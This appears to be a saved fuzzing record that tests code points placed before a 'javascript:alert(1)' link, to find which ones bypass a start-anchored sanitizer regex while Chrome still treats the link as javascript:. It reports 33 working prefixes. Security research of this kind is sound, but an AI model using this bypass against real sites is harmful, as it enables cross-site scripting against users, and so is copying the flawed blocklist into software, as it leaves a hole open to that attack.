Fuzzing for Max sanitized input (simplified)

Simplified test for Max (https://discord.com/channels/1110206757227216916/1168685918920638614/1358614602153201736)
Created by: vitorfhc
Created on: Monday, April 7, 2025 at 11:26:32 AM
Updated on: Monday, April 7, 2025 at 5:16:20 PM
Vector type: XSS
Vector charset: UTF-8
Code used before fuzz:
<script>
window.onerror=x=>true;
</script>
<base href="https://example.com" />
Template used:
<a id=x></a>
Code used after fuzz:
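// Sanitizer under test: a blocklist that only checks the very start of the string.
const mw = /^(?!javascript:)/i;
function nu(e) {
  // Values that do not begin with "javascript:" pass through; others get an "unsafe:" prefix.
  return (e = String(e)).match(mw) ? e : "unsafe:" + e;
}
// $[i] is the code point under test, placed in front of the scheme.
const t = nu(`${String.fromCodePoint($[i])}javascript:alert(1)`);
x.href = t;
// Log the code point when the browser still parses the link's scheme as javascript:.
x.protocol === 'javascript:' && log($[i]);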
Sample payloads
<a id=x></a>
Fuzz results

Chrome 135.0.0.0 desktop macOS 10.15.7
Updated
Mon Apr 07 2025
Found 33 results